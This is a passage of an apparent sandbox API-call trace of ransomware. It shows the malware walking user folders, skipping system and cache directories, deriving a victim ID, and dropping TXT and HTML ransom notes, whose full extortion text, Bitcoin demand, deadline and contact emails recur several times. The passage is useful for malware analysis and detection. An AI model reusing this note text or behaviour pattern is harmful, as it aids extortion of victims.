	[0179.729] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d527734, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d527734, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d527734, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1
	[0179.729] lstrcmpW (lpString1="My Videos", lpString2="..") returned 1
	[0179.730] lstrcmpW (lpString1="My Videos", lpString2=".") returned 1
	[0179.730] lstrcpyW (in: lpString1=0x18c29c, lpString2="C:\\Users\\Default\\Documents" | out: lpString1="C:\\Users\\Default\\Documents") returned="C:\\Users\\Default\\Documents"
	[0179.730] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Documents\\") returned="C:\\Users\\Default\\Documents\\"
	[0179.730] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\", lpString2="My Videos" | out: lpString1="C:\\Users\\Default\\Documents\\My Videos") returned="C:\\Users\\Default\\Documents\\My Videos"
	[0179.730] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\Default\\Documents\\My Videos" | out: lpString1="C:\\Users\\Default\\Documents\\My Videos") returned="C:\\Users\\Default\\Documents\\My Videos"
	[0179.730] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\My Videos", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Documents\\My Videos\\") returned="C:\\Users\\Default\\Documents\\My Videos\\"
	[0179.730] lstrcpyW (in: lpString1=0x18b384, lpString2="C:\\Users\\Default\\Documents\\My Videos\\" | out: lpString1="C:\\Users\\Default\\Documents\\My Videos\\") returned="C:\\Users\\Default\\Documents\\My Videos\\"
	[0179.730] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\My Videos\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Documents\\My Videos\\*.*") returned="C:\\Users\\Default\\Documents\\My Videos\\*.*"
	[0179.731] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Documents\\My Videos\\*.*" (normalized: "c:\\users\\default\\documents\\my videos\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="shell32.dll")) returned 0xffffffff
	[0179.731] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0179.731] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\Default\\Documents\\My Videos" | out: lpString1="C:\\Users\\Default\\Documents\\My Videos") returned="C:\\Users\\Default\\Documents\\My Videos"
	[0179.731] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\My Videos", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Documents\\My Videos\\*.*") returned="C:\\Users\\Default\\Documents\\My Videos\\*.*"
	[0179.731] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0179.732] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0179.732] wsprintfW (in: param_1=0x18b080, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\Default\\Documents\\My Videos\\HELP_DECRYPT_YOUR_FILES.TXT") returned 64
	[0179.732] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\My Videos\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\default\\documents\\my videos\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0179.732] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0179.733] WriteFile (in: hFile=0x384, lpBuffer=0x18a438*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18b35c, lpOverlapped=0x0 | out: lpBuffer=0x18a438*, lpNumberOfBytesWritten=0x18b35c*=0xc46, lpOverlapped=0x0) returned 1
	[0179.736] CloseHandle (hObject=0x384) returned 1
	[0179.736] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a408, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a408*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0179.737] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0179.737] GetUserNameA (in: lpBuffer=0x18a2ec, pcbBuffer=0x18a404 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a404) returned 1
	[0179.738] wsprintfW (in: param_1=0x18b288, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0179.738] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\My Videos\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\default\\documents\\my videos\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0179.738] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0179.739] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0179.739] WriteFile (in: hFile=0x384, lpBuffer=0x18b288*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18b364, lpOverlapped=0x0 | out: lpBuffer=0x18b288*, lpNumberOfBytesWritten=0x18b364*=0x30, lpOverlapped=0x0) returned 1
	[0179.739] CloseHandle (hObject=0x384) returned 1
	[0179.739] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0179.740] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0179.740] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0179.740] wsprintfW (in: param_1=0x18b040, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\Default\\Documents\\My Videos\\HELP_DECRYPT_YOUR_FILES.HTML") returned 65
	[0179.740] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\My Videos\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\default\\documents\\my videos\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0179.741] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0179.741] WriteFile (in: hFile=0x384, lpBuffer=0x18a834*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0x18a834*, lpNumberOfBytesWritten=0x18b358*=0x808, lpOverlapped=0x0) returned 1
	[0179.743] CloseHandle (hObject=0x384) returned 1
	[0179.744] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0179.744] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a81c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a81c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0179.744] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0179.745] GetUserNameA (in: lpBuffer=0x18a700, pcbBuffer=0x18a818 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a818) returned 1
	[0179.747] wsprintfA (in: param_1=0x18b248, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0179.747] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\My Videos\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\default\\documents\\my videos\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0179.747] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0179.748] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0179.748] WriteFile (in: hFile=0x384, lpBuffer=0x18b248*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18b360, lpOverlapped=0x0 | out: lpBuffer=0x18b248*, lpNumberOfBytesWritten=0x18b360*=0x43, lpOverlapped=0x0) returned 1
	[0179.748] CloseHandle (hObject=0x384) returned 1
	[0179.748] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Documents\\My Videos\\*.*" (normalized: "c:\\users\\default\\documents\\my videos\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="shell32.dll")) returned 0xffffffff
	[0179.748] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0179.748] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d527734, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d527734, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d527734, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 0
	[0179.748] FindClose (in: hFindFile=0xfb97b0 | out: hFindFile=0xfb97b0) returned 1
	[0179.748] FindClose (in: hFindFile=0xfb97b0 | out: hFindFile=0xfb97b0) returned 0
	[0179.749] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1
	[0179.749] lstrcmpW (lpString1="Downloads", lpString2="..") returned 1
	[0179.749] lstrcmpW (lpString1="Downloads", lpString2=".") returned 1
	[0179.749] lstrcpyW (in: lpString1=0x18cfac, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default"
	[0179.749] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\"
	[0179.749] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Downloads" | out: lpString1="C:\\Users\\Default\\Downloads") returned="C:\\Users\\Default\\Downloads"
	[0179.750] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\Default\\Downloads" | out: lpString1="C:\\Users\\Default\\Downloads") returned="C:\\Users\\Default\\Downloads"
	[0179.750] lstrcatW (in: lpString1="C:\\Users\\Default\\Downloads", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Downloads\\") returned="C:\\Users\\Default\\Downloads\\"
	[0179.750] lstrcpyW (in: lpString1=0x18c094, lpString2="C:\\Users\\Default\\Downloads\\" | out: lpString1="C:\\Users\\Default\\Downloads\\") returned="C:\\Users\\Default\\Downloads\\"
	[0179.750] lstrcatW (in: lpString1="C:\\Users\\Default\\Downloads\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Downloads\\*.*") returned="C:\\Users\\Default\\Downloads\\*.*"
	[0179.750] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Downloads\\*.*" (normalized: "c:\\users\\default\\downloads\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb97b0
	[0179.751] lstrlenW (lpString="C:\\Users\\Default\\Downloads\\*.*") returned 30
	[0179.752] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0179.752] CharLowerBuffW (in: lpsz="C:\\Users\\Default\\Downloads\\*.*", cchLength=0x1e | out: lpsz="c:\\users\\default\\downloads\\*.*") returned 0x1e
	[0179.752] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.752] StrStrW (lpFirst="c:\\users\\default\\downloads\\*.*", lpSrch="windows") returned 0x0
	[0179.752] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.752] StrStrW (lpFirst="c:\\users\\default\\downloads\\*.*", lpSrch="boot") returned 0x0
	[0179.752] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.753] StrStrW (lpFirst="c:\\users\\default\\downloads\\*.*", lpSrch="system volume information") returned 0x0
	[0179.753] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.753] StrStrW (lpFirst="c:\\users\\default\\downloads\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0179.753] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.753] StrStrW (lpFirst="c:\\users\\default\\downloads\\*.*", lpSrch="temp") returned 0x0
	[0179.753] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.754] StrStrW (lpFirst="c:\\users\\default\\downloads\\*.*", lpSrch="program files") returned 0x0
	[0179.754] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.754] StrStrW (lpFirst="c:\\users\\default\\downloads\\*.*", lpSrch="program files (x86)") returned 0x0
	[0179.754] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.754] StrStrW (lpFirst="c:\\users\\default\\downloads\\*.*", lpSrch="appdata") returned 0x0
	[0179.754] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.754] StrStrW (lpFirst="c:\\users\\default\\downloads\\*.*", lpSrch="application data") returned 0x0
	[0179.754] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.755] StrStrW (lpFirst="c:\\users\\default\\downloads\\*.*", lpSrch="winnt") returned 0x0
	[0179.755] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.755] StrStrW (lpFirst="c:\\users\\default\\downloads\\*.*", lpSrch="tmp") returned 0x0
	[0179.755] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.755] StrStrW (lpFirst="c:\\users\\default\\downloads\\*.*", lpSrch="cache") returned 0x0
	[0179.755] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.755] StrStrW (lpFirst="c:\\users\\default\\downloads\\*.*", lpSrch="temporary internet files") returned 0x0
	[0179.756] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.756] StrStrW (lpFirst="c:\\users\\default\\downloads\\*.*", lpSrch="webcache") returned 0x0
	[0179.756] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.756] StrStrW (lpFirst="c:\\users\\default\\downloads\\*.*", lpSrch="inetcache") returned 0x0
	[0179.756] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.756] StrStrW (lpFirst="c:\\users\\default\\downloads\\*.*", lpSrch="nvidia") returned 0x0
	[0179.756] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.757] StrStrW (lpFirst="c:\\users\\default\\downloads\\*.*", lpSrch="packages") returned 0x0
	[0179.757] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.757] StrStrW (lpFirst="c:\\users\\default\\downloads\\*.*", lpSrch="cookies") returned 0x0
	[0179.757] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.757] StrStrW (lpFirst="c:\\users\\default\\downloads\\*.*", lpSrch="programdata") returned 0x0
	[0179.757] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0179.757] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0
	[0179.758] FindClose (in: hFindFile=0xfb97b0 | out: hFindFile=0xfb97b0) returned 1
	[0179.758] FindClose (in: hFindFile=0xfb97b0 | out: hFindFile=0xfb97b0) returned 0
	[0179.758] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\Default\\Downloads" | out: lpString1="C:\\Users\\Default\\Downloads") returned="C:\\Users\\Default\\Downloads"
	[0179.758] lstrcatW (in: lpString1="C:\\Users\\Default\\Downloads", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Downloads\\*.*") returned="C:\\Users\\Default\\Downloads\\*.*"
	[0179.758] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0179.759] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0179.759] wsprintfW (in: param_1=0x18bd90, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\Default\\Downloads\\HELP_DECRYPT_YOUR_FILES.TXT") returned 54
	[0179.759] CreateFileW (lpFileName="C:\\Users\\Default\\Downloads\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\default\\downloads\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0179.759] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0179.759] WriteFile (in: hFile=0x380, lpBuffer=0x18b148*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18c06c, lpOverlapped=0x0 | out: lpBuffer=0x18b148*, lpNumberOfBytesWritten=0x18c06c*=0xc46, lpOverlapped=0x0) returned 1
	[0179.761] CloseHandle (hObject=0x380) returned 1
	[0179.762] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b118, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b118*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0179.762] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0179.762] GetUserNameA (in: lpBuffer=0x18affc, pcbBuffer=0x18b114 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b114) returned 1
	[0179.763] wsprintfW (in: param_1=0x18bf98, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0179.763] CreateFileW (lpFileName="C:\\Users\\Default\\Downloads\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\default\\downloads\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0179.764] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0179.764] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0179.764] WriteFile (in: hFile=0x380, lpBuffer=0x18bf98*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18c074, lpOverlapped=0x0 | out: lpBuffer=0x18bf98*, lpNumberOfBytesWritten=0x18c074*=0x30, lpOverlapped=0x0) returned 1
	[0179.764] CloseHandle (hObject=0x380) returned 1
	[0179.764] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0179.765] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0179.765] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0179.765] wsprintfW (in: param_1=0x18bd50, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\Default\\Downloads\\HELP_DECRYPT_YOUR_FILES.HTML") returned 55
	[0179.765] CreateFileW (lpFileName="C:\\Users\\Default\\Downloads\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\default\\downloads\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0179.767] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf 